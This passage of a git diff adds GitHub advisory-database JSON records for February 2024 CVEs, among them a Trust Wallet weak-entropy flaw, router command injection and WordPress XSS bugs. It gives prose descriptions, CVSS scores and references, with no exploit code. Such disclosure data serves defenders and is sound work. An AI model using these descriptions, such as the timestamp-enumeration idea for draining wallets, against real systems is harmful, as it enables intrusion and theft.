device.\n\n\n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47867" + }, + { + "type": "WEB", + "url": "https://machinesense.com/pages/about-machinesense" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hcm7-vvxh-5crx/GHSA-hcm7-vvxh-5crx.json b/advisories/unreviewed/2024/02/GHSA-hcm7-vvxh-5crx/GHSA-hcm7-vvxh-5crx.json new file mode 100644 index 0000000000000..9208343109803 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hcm7-vvxh-5crx/GHSA-hcm7-vvxh-5crx.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hcm7-vvxh-5crx", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-23660" + ], + "details": "The Binance Trust Wallet app for iOS in commit 3cd6e8f647fbba8b5d8844fcd144365a086b629f, git tag 0.0.4 misuses the trezor-crypto library and consequently generates mnemonic words for which the device time is the only entropy source, leading to economic losses, as exploited in the wild in July 2023. An attacker can systematically generate mnemonics for each timestamp within an applicable timeframe, and link them to specific wallet addresses in order to steal funds from those wallets.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23660" + }, + { + "type": "WEB", + "url": "https://milksad.info/posts/research-update-5/" + }, + { + "type": "WEB", + "url": "https://secbit.io/blog/en/2024/01/19/trust-wallets-fomo3d-summer-vuln/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T20:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hfp7-mmwm-2mmx/GHSA-hfp7-mmwm-2mmx.json b/advisories/unreviewed/2024/02/GHSA-hfp7-mmwm-2mmx/GHSA-hfp7-mmwm-2mmx.json new file mode 100644 index 0000000000000..24c458c48c3d7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hfp7-mmwm-2mmx/GHSA-hfp7-mmwm-2mmx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hfp7-mmwm-2mmx", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41279" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41279" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hg2h-hf62-jjm8/GHSA-hg2h-hf62-jjm8.json b/advisories/unreviewed/2024/02/GHSA-hg2h-hf62-jjm8/GHSA-hg2h-hf62-jjm8.json new file mode 100644 index 0000000000000..021878a5f9d98 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hg2h-hf62-jjm8/GHSA-hg2h-hf62-jjm8.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hg2h-hf62-jjm8", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-1079" + ], + "details": "The Quiz Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_show_results() function in all versions up to, and including, 6.5.2.4. This makes it possible for unauthenticated attackers to fetch arbitrary quiz results which can contain PII.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1079" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/602df370-cd5b-46dc-a653-6522aef0c62f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T08:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hgwr-gpf8-663p/GHSA-hgwr-gpf8-663p.json b/advisories/unreviewed/2024/02/GHSA-hgwr-gpf8-663p/GHSA-hgwr-gpf8-663p.json new file mode 100644 index 0000000000000..b65e85921e69f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hgwr-gpf8-663p/GHSA-hgwr-gpf8-663p.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hgwr-gpf8-663p", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-47617" + ], + "details": "A post authentication command injection vulnerability exists when configuring the web group member of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47617" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1858" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hh96-8ff8-hwhp/GHSA-hh96-8ff8-hwhp.json b/advisories/unreviewed/2024/02/GHSA-hh96-8ff8-hwhp/GHSA-hh96-8ff8-hwhp.json new file mode 100644 index 0000000000000..4162d4bb830da --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hh96-8ff8-hwhp/GHSA-hh96-8ff8-hwhp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hh96-8ff8-hwhp", + "modified": "2024-02-02T03:30:31Z", + "published": "2024-02-02T03:30:31Z", + "aliases": [ + "CVE-2023-50326" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 275107.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50326" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275107" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-307" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T01:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hmgm-p594-v4hg/GHSA-hmgm-p594-v4hg.json b/advisories/unreviewed/2024/02/GHSA-hmgm-p594-v4hg/GHSA-hmgm-p594-v4hg.json new file mode 100644 index 0000000000000..e2fe1e47e3451 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hmgm-p594-v4hg/GHSA-hmgm-p594-v4hg.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hmgm-p594-v4hg", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24026" + ], + "details": "An arbitrary File upload vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions at com.java2nb.system.controller.SysUserController: uploadImg(). An attacker can pass in specially crafted filename parameter to perform arbitrary File download.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24026" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24026.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T01:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hmwv-4vph-2r3h/GHSA-hmwv-4vph-2r3h.json b/advisories/unreviewed/2024/02/GHSA-hmwv-4vph-2r3h/GHSA-hmwv-4vph-2r3h.json new file mode 100644 index 0000000000000..432b741be33d5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hmwv-4vph-2r3h/GHSA-hmwv-4vph-2r3h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hmwv-4vph-2r3h", + "modified": "2024-02-02T09:30:22Z", + "published": "2024-02-02T09:30:22Z", + "aliases": [ + "CVE-2024-21845" + ], + "details": "\nin OpenHarmony v4.0.0 and prior versions allow a local attacker cause heap overflow through integer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21845" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hqm8-gpp6-j34p/GHSA-hqm8-gpp6-j34p.json b/advisories/unreviewed/2024/02/GHSA-hqm8-gpp6-j34p/GHSA-hqm8-gpp6-j34p.json new file mode 100644 index 0000000000000..27897aa28e464 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hqm8-gpp6-j34p/GHSA-hqm8-gpp6-j34p.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hqm8-gpp6-j34p", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43534" + ], + "details": "Memory corruption while validating the TID to Link Mapping action request frame, when a station connects to an access point.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43534" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hvff-fx7p-9p3g/GHSA-hvff-fx7p-9p3g.json b/advisories/unreviewed/2024/02/GHSA-hvff-fx7p-9p3g/GHSA-hvff-fx7p-9p3g.json new file mode 100644 index 0000000000000..8f006381fc0a3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hvff-fx7p-9p3g/GHSA-hvff-fx7p-9p3g.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hvff-fx7p-9p3g", + "modified": "2024-02-07T15:30:48Z", + "published": "2024-02-07T15:30:48Z", + "aliases": [ + "CVE-2024-24186" + ], + "details": "Jsish v3.5.0 (commit 42c694c) was discovered to contain a stack-overflow via the component IterGetKeysCallback at /jsish/src/jsiValue.c.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24186" + }, + { + "type": "WEB", + "url": "https://github.com/pcmacdon/jsish/issues/98" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hvwp-rfc8-3www/GHSA-hvwp-rfc8-3www.json b/advisories/unreviewed/2024/02/GHSA-hvwp-rfc8-3www/GHSA-hvwp-rfc8-3www.json new file mode 100644 index 0000000000000..4ed4b7eddf9dd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hvwp-rfc8-3www/GHSA-hvwp-rfc8-3www.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hvwp-rfc8-3www", + "modified": "2024-02-07T06:35:21Z", + "published": "2024-02-07T06:35:21Z", + "aliases": [ + "CVE-2024-0256" + ], + "details": "The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Profile Display Name and Social Settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0256" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029599/starbox" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T05:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hxw7-jqv7-6h7r/GHSA-hxw7-jqv7-6h7r.json b/advisories/unreviewed/2024/02/GHSA-hxw7-jqv7-6h7r/GHSA-hxw7-jqv7-6h7r.json new file mode 100644 index 0000000000000..d38942305d5e3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hxw7-jqv7-6h7r/GHSA-hxw7-jqv7-6h7r.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hxw7-jqv7-6h7r", + "modified": "2024-02-06T03:32:59Z", + "published": "2024-02-06T03:32:59Z", + "aliases": [ + "CVE-2023-47889" + ], + "details": "The Android application BINHDRM26 com.bdrm.superreboot 1.0.3, exposes several critical actions through its exported broadcast receivers. These exposed actions can allow any app on the device to send unauthorized broadcasts, leading to unintended consequences. The vulnerability is particularly concerning because these actions include powering off, system reboot & entering recovery mode.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47889" + }, + { + "type": "WEB", + "url": "https://github.com/actuator/com.bdrm.superreboot/blob/main/CWE-925.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j2p8-grvm-cx5w/GHSA-j2p8-grvm-cx5w.json b/advisories/unreviewed/2024/02/GHSA-j2p8-grvm-cx5w/GHSA-j2p8-grvm-cx5w.json new file mode 100644 index 0000000000000..65d5619496048 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j2p8-grvm-cx5w/GHSA-j2p8-grvm-cx5w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j2p8-grvm-cx5w", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51677" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magazine3 Schema & Structured Data for WP & AMP allows Stored XSS.This issue affects Schema & Structured Data for WP & AMP: from n/a through 1.23.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51677" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/schema-and-structured-data-for-wp/wordpress-schema-structured-data-for-wp-amp-plugin-1-23-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j3pp-77jw-4qv6/GHSA-j3pp-77jw-4qv6.json b/advisories/unreviewed/2024/02/GHSA-j3pp-77jw-4qv6/GHSA-j3pp-77jw-4qv6.json new file mode 100644 index 0000000000000..666a5ce7010ca --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j3pp-77jw-4qv6/GHSA-j3pp-77jw-4qv6.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j3pp-77jw-4qv6", + "modified": "2024-02-02T21:31:29Z", + "published": "2024-02-02T21:31:29Z", + "aliases": [ + "CVE-2024-1190" + ], + "details": "A vulnerability was found in Global Scape CuteFTP 9.3.0.3 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument Host/Username/Password leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252680. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1190" + }, + { + "type": "WEB", + "url": "https://fitoxs.com/vuldb/16-exploit-perl.txt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252680" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252680" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j428-8h66-82p9/GHSA-j428-8h66-82p9.json b/advisories/unreviewed/2024/02/GHSA-j428-8h66-82p9/GHSA-j428-8h66-82p9.json new file mode 100644 index 0000000000000..6a95ddb4efb27 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j428-8h66-82p9/GHSA-j428-8h66-82p9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j428-8h66-82p9", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20818" + ], + "details": "Out out bounds Write vulnerabilities in svc1td_vld_elh of libsthmbc.so prior to SMR Feb-2024 Release 1 allows local attackers to trigger buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20818" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j5jm-rppg-h4j8/GHSA-j5jm-rppg-h4j8.json b/advisories/unreviewed/2024/02/GHSA-j5jm-rppg-h4j8/GHSA-j5jm-rppg-h4j8.json new file mode 100644 index 0000000000000..638387d242733 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j5jm-rppg-h4j8/GHSA-j5jm-rppg-h4j8.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j5jm-rppg-h4j8", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-45028" + ], + "details": "An uncontrolled resource consumption vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to launch a denial-of-service (DoS) attack via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45028" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j6qm-xgxc-g34g/GHSA-j6qm-xgxc-g34g.json b/advisories/unreviewed/2024/02/GHSA-j6qm-xgxc-g34g/GHSA-j6qm-xgxc-g34g.json new file mode 100644 index 0000000000000..173335a239322 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j6qm-xgxc-g34g/GHSA-j6qm-xgxc-g34g.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j6qm-xgxc-g34g", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20015" + ], + "details": "In telephony, there is a possible escalation of privilege due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08441419; Issue ID: ALPS08441419.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20015" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j839-f55x-qp69/GHSA-j839-f55x-qp69.json b/advisories/unreviewed/2024/02/GHSA-j839-f55x-qp69/GHSA-j839-f55x-qp69.json new file mode 100644 index 0000000000000..276be1f72b2d3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j839-f55x-qp69/GHSA-j839-f55x-qp69.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j839-f55x-qp69", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-22388" + ], + "details": "\nCertain configuration available in the communication channel for encoders could expose sensitive data when reader configuration cards are programmed. This data could include credential and device administration keys.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22388" + }, + { + "type": "WEB", + "url": "https://support.hidglobal.com/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j973-rvvm-fh3w/GHSA-j973-rvvm-fh3w.json b/advisories/unreviewed/2024/02/GHSA-j973-rvvm-fh3w/GHSA-j973-rvvm-fh3w.json new file mode 100644 index 0000000000000..24a93ebd72e52 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j973-rvvm-fh3w/GHSA-j973-rvvm-fh3w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j973-rvvm-fh3w", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20826" + ], + "details": "Implicit intent hijacking vulnerability in UPHelper library prior to version 4.0.0 allows local attackers to access sensitive information via implicit intent.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20826" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j9rf-q3p6-99gv/GHSA-j9rf-q3p6-99gv.json b/advisories/unreviewed/2024/02/GHSA-j9rf-q3p6-99gv/GHSA-j9rf-q3p6-99gv.json new file mode 100644 index 0000000000000..5c67944748b5d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j9rf-q3p6-99gv/GHSA-j9rf-q3p6-99gv.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j9rf-q3p6-99gv", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2024-24291" + ], + "details": "An issue in the component /member/index/login of yzmcms v7.0 allows attackers to direct users to malicious sites via a crafted URL.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24291" + }, + { + "type": "WEB", + "url": "https://gitee.com/wgd0ay/wgd0ay/issues/I8WSD1" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jc76-h9fq-qvwx/GHSA-jc76-h9fq-qvwx.json b/advisories/unreviewed/2024/02/GHSA-jc76-h9fq-qvwx/GHSA-jc76-h9fq-qvwx.json new file mode 100644 index 0000000000000..5f4a5375e1e2b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jc76-h9fq-qvwx/GHSA-jc76-h9fq-qvwx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jc76-h9fq-qvwx", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2023-38995" + ], + "details": "An issue in SCHUHFRIED v.8.22.00 allows remote attacker to obtain the database password via crafted curl command.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38995" + }, + { + "type": "WEB", + "url": "https://github.com/post-cyberlabs/CVE-Advisory/blob/main/CVE-2023-38995-Schuhfried-Preauth-PrivEsc.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T20:15:49Z" + } +} \ No newline at end of file diff --git 